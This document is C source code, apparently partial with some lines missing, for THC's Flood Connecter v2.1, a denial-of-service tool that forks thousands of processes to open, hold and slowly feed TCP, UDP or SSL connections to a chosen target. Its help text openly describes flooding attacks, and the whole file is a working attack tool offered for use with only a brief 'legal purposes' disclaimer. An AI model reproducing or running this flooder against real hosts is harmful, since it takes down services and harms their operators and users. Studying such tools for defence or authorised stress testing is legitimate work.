2 * Flood Connecter v2.1 (c) 2003-2005 by van Hauser / THC <vh@thc.org>
5 * Connection flooder, can also send data, keep connections open etc.
8 * 2.1 Small enhancements and bugfixes
9 * 2.0 added slow send options (-w/-W), very powerful!
10 * 1.4 initial public release
12 * Use allowed only for legal purposes.
14 * To compile: cc -o flood_connect -O2 flood_connect.c
15 * with openssl: cc -o flood_connect -O2 flood_connect.c -DOPENSSL -lssl
22 #include <netinet/in.h>
23 #include <netinet/tcp.h>
24 #include <sys/types.h>
25 #include <sys/socket.h>
28 #include <sys/resource.h>
29 #include <arpa/inet.h>
36 #define PORT 80 // change this if you want
37 #define UNLIMITED 0 // dont change this
38 #define MAX_SOCKETS 65536 // change this if you want to
39 #define MAXFORKS 10240
42 #include <openssl/ssl.h>
43 #include <openssl/err.h>
45 SSL_CTX *sslContext = NULL;
48 RSA *ssl_temp_rsa_cb(SSL *ssl, int export, int keylength) {
50 rsa = RSA_generate_key(512, RSA_F4, NULL, NULL);
68 socket_struct sockets[MAX_SOCKETS];
75 unsigned long int count = 0, successful = 0;
78 printf("Flood Connect v2.0 (c) 2003 by van Hauser/THC <vh@thc.org> http://www.thc.org\n");
79 printf("Syntax: %s [-S] [-u] [-p port] [-i file] [-n connects] [-N delay] [-c] [-C delay] [-d] [-D delay] [-w bytes] [-W delay] [-e] [-k] [-v] TARGET\n", prg);
81 printf(" -S use SSL after TCP connect (not with -u, sets default port=443)\n");
82 printf(" -u use UDP protocol (default: TCP) (not usable with -c and -S)\n");
83 printf(" -p port port to connect to (default: %d)\n", PORT);
84 printf(" -f forks number of forks to additionally spawn (default: 0)\n");
85 printf(" -i file data to send to the port (default: none)\n");
86 printf(" -n connects maximum number of connects (default: unlimited)\n");
87 printf(" -N delay delay in ms between connects (default: 0)\n");
88 printf(" -c close after connect (and sending data, if used with -i)\n");
89 printf(" use twice to shutdown SSL sessions hard (-S -c -c)\n");
90 printf(" -C delay delay in ms before closing the port (use with -c) (default: 0)\n");
91 printf(" -d dump data read from server\n");
92 printf(" -D delay delay in ms before read+dump data (-d) from server (default: 0)\n");
93 printf(" -w bytes amount of data from -i to send at one time (default: all)\n");
94 printf(" -W delay delay in seconds between sends, required by -w option\n");
95 printf(" -e stop when no more connects possible (default: retry forever)\n");
96 printf(" -k no keep-alive after finnishing with connects - terminate!\n");
97 printf(" -v verbose mode\n");
98 printf(" TARGET target to flood attack (ip or dns)\n");
99 printf("Connection flooder. Nothing more to say. Use only allowed for legal purposes.\n");
103 void kill_children(int signo) {
105 printf("Aborted (made %s%ld successful connects)\n", forks ? "approx. " : "", successful + successful * forks);
107 kill(pids[i], SIGTERM);
113 kill(pids[i], SIGKILL);
119 void killed_children(int signo) {
122 printf("Killed (made %ld successful connects)\n", successful);
128 int i = 0, send = send_amount;
130 if (last_send + send_delay > time(NULL))
132 last_send = time(NULL);
134 for (i = 0; i < MAX_SOCKETS; i++) {
135 if (sockets[i].socket >= 0) {
136 if (sockets[i].where < str_len) {
137 if (sockets[i].where + send > str_len)
138 send = str_len - sockets[i].where;
141 SSL_write(sockets[i].ssl, str + sockets[i].where, send);
144 write(sockets[i].socket, str + sockets[i].where, send);
146 sockets[i].where += send;
152 int main(int argc, char *argv[]) {
153 unsigned short int port = PORT;
154 long int max_connects = UNLIMITED;
155 int close_connection = 0;
156 int exit_on_sock_error = 0;
160 long int connect_delay = 0, close_delay = 0, dump_delay = 0;
170 int sock_type = SOCK_STREAM;
171 int sock_protocol = IPPROTO_TCP;
173 struct sockaddr_in target;
174 struct hostent *resolv;
176 int pidcount = 0, res = 0;
180 memset(sockets, 0, sizeof(sockets));
181 for (i = 0; i < MAX_SOCKETS; i++)
182 sockets[i].socket = -1;
184 if (argc < 2 || strncmp(argv[1], "-h", 2) == 0)
187 while ((i = getopt(argc, argv, "cf:C:dD:N:ei:kn:p:SuvVw:W:")) >= 0) {
189 case 'c': close_connection++; break;
190 case 'f': forks = atoi(optarg); break;
191 case 'N': connect_delay = atol(optarg); break;
192 case 'C': close_delay = atol(optarg); break;
193 case 'D': dump_delay = atol(optarg); break;
194 case 'W': send_delay = atoi(optarg); break;
195 case 'w': send_amount = atoi(optarg); break;
196 case 'd': dump = 1; break;
197 case 'e': exit_on_sock_error = 1; break;
198 case 'u': sock_type = SOCK_DGRAM;
199 sock_protocol = IPPROTO_UDP;
201 case 'v': verbose = 1; break;
202 case 'V': debug = 1; break;
203 case 'i': infile = optarg; break;
204 case 'k': keep_alive = 0; break;
205 case 'n': max_connects = atol(optarg); break;
206 case 'S': use_ssl = 1;
210 fprintf(stderr, "Error: Not compiled with openssl support, use -DOPENSSL -lssl\n");
214 case 'p': if (atoi(optarg) < 1 || atoi(optarg) > 65535) {
215 fprintf(stderr, "Error: port must be between 1 and 65535\n");
218 port = atoi(optarg) % 65536;
220 default: fprintf(stderr,"Error: unknown option -%c\n", i); help();
224 if (optind + 1 != argc) {
225 fprintf(stderr, "Error: target missing or too many commandline options!\n");
229 if ((send_amount || send_delay) && ! (send_amount && send_delay) ) {
230 fprintf(stderr, "Error: you must specify both -w and -W options together!\n");
234 if (close_connection && send_delay) {
235 fprintf(stderr, "Error: you can not use -c and -w/-W options together!\n");
239 if (forks > MAXFORKS) {
240 fprintf(stderr, "Error: Maximum number of pids is %d, edit code and recompile\n", MAXFORKS);
244 if (infile != NULL) {
245 if ((f = fopen(infile, "r")) == NULL) {
246 fprintf(stderr, "Error: can not find file %s\n", infile);
249 fstat(fileno(f), &st);
250 str_len = (int) st.st_size;
251 str = malloc(str_len);
252 fread(str, str_len, 1, f);
256 if ((resolv = gethostbyname(argv[argc-1])) == NULL) {
257 fprintf(stderr, "Error: can not resolve target\n");
260 memset(&target, 0, sizeof(target));
261 memcpy(&target.sin_addr.s_addr, resolv->h_addr, 4);
262 target.sin_port = htons(port);
263 target.sin_family = AF_INET;
265 if (connect_delay > 0)
266 connect_delay = connect_delay * 1000; /* ms to microseconds */
270 close_delay = close_delay * 1000; /* ms to microseconds */
274 dump_delay = dump_delay * 1000; /* ms to microseconds */
278 rlim.rlim_cur = MAXFORKS + 1;
279 rlim.rlim_max = MAXFORKS + 2;
280 ret = setrlimit(RLIMIT_NPROC, &rlim);
281 #ifndef RLIMIT_NOFILE
283 #define RLIMIT_NOFILE RLIMIT_OFILE
286 rlim.rlim_cur = 60000;
287 rlim.rlim_max = 60001;
288 ret = setrlimit(RLIMIT_NOFILE, &rlim);
289 rlim.rlim_cur = RLIM_INFINITY;
290 rlim.rlim_max = RLIM_INFINITY;
291 ret = setrlimit(RLIMIT_NPROC, &rlim);
292 ret = setrlimit(RLIMIT_NOFILE, &rlim);
295 printf("setrlimit for unlimited filedescriptors succeeded.\n");
297 printf("setrlimit for unlimited filedescriptors failed.\n");
300 for (i = 3; i < 4096; i++)
303 printf("Starting flood connect attack on %s port %d\n", inet_ntoa((struct in_addr)target.sin_addr), port);
304 (void) setvbuf(stdout, NULL, _IONBF, 0);
306 printf("Writing a \".\" for every 100 connect attempts\n");
315 while(pidcount < forks && res != 0) {
316 res = pids[pidcount] = fork();
322 signal(SIGTERM, killed_children);
326 if (verbose && pidcount > 0)
327 printf("Spawned %d clients\n", pidcount);
328 signal(SIGTERM, kill_children);
329 signal(SIGINT, kill_children);
330 signal(SIGSEGV, kill_children);
331 signal(SIGHUP, kill_children);
336 SSL_load_error_strings();
337 SSLeay_add_ssl_algorithms();
339 // context: ssl2 + ssl3 is allowed, whatever the server demands
340 if ((sslContext = SSL_CTX_new(SSLv23_method())) == NULL) {
342 err = ERR_get_error();
343 fprintf(stderr, "SSL: Error allocating context: %s\n", ERR_error_string(err, NULL));
348 // set the compatbility mode
349 SSL_CTX_set_options(sslContext, SSL_OP_ALL);
351 // we set the default verifiers and dont care for the results
352 (void) SSL_CTX_set_default_verify_paths(sslContext);
353 SSL_CTX_set_tmp_rsa_callback(sslContext, ssl_temp_rsa_cb);
354 SSL_CTX_set_verify(sslContext, SSL_VERIFY_NONE, NULL);
358 while (count < max_connects || max_connects == UNLIMITED) {
360 if ((s = socket(AF_INET, sock_type, sock_protocol)) < 0) {
361 if (verbose && warn == 0) {
362 perror("Warning (socket)");
365 if (exit_on_sock_error)
368 setsockopt(s, SOL_SOCKET, SO_REUSEADDR, &i, sizeof(i));
372 ret = connect(s, (struct sockaddr *)&target, sizeof(target));
373 if (use_ssl && ret >= 0) {
375 if ((ssl = SSL_new(sslContext)) == NULL) {
377 err = ERR_get_error();
378 fprintf(stderr, "Error preparing an SSL context: %s\n", ERR_error_string(err, NULL));
383 if (ret >= 0 && SSL_connect(ssl) <= 0) {
384 printf("ERROR %d\n", SSL_connect(ssl));
386 err = ERR_get_error();
387 fprintf(stderr, "Could not create an SSL session: %s\n", ERR_error_string(err, NULL));
393 fprintf(stderr, "SSL negotiated cipher: %s\n", SSL_get_cipher(ssl));
401 sockets[s].socket = s;
402 sockets[s].where = 0;
404 sockets[s].ssl = ssl;
407 if (setsockopt(s, SOL_TCP, TCP_NODELAY, &i, sizeof(i)) != 0)
408 perror("Warning (setsockopt SOL_TCP)");
409 if (send_delay > 0) {
414 SSL_write(ssl, str, str_len);
417 write(s, str, str_len);
422 fcntl(s, F_SETFL, O_NONBLOCK);
427 reads = SSL_read(ssl, buf, sizeof(buf));
430 reads = read(s, buf, sizeof(buf));
433 printf("DATA: %s\n", buf);
437 if (close_connection) {
441 if (use_ssl && close_connection == 1)
446 if (use_ssl && close_connection > 1)
450 if (connect_delay > 0)
451 usleep(connect_delay);
453 if (verbose && warn == 0) {
454 perror("Warning (connect)");
457 if (exit_on_sock_error)
461 if (count % 100 == 0)
473 printf("Done (made %s%ld successful connects)\n", forks ? "approx. " : "", successful + successful * forks);
476 printf("Still sending data ...\n");
481 for (i = 0; i < MAX_SOCKETS; i++)
482 if (sockets[i].socket >= 0 && sockets[i].where < str_len)
486 if (keep_alive && close_connection == 0) {
487 printf("Press <ENTER> to terminate connections and this program\n");
492 usleep(1 + connect_delay + dump_delay + close_delay);
494 kill(pids[i], SIGTERM);
500 kill(pids[i], SIGKILL);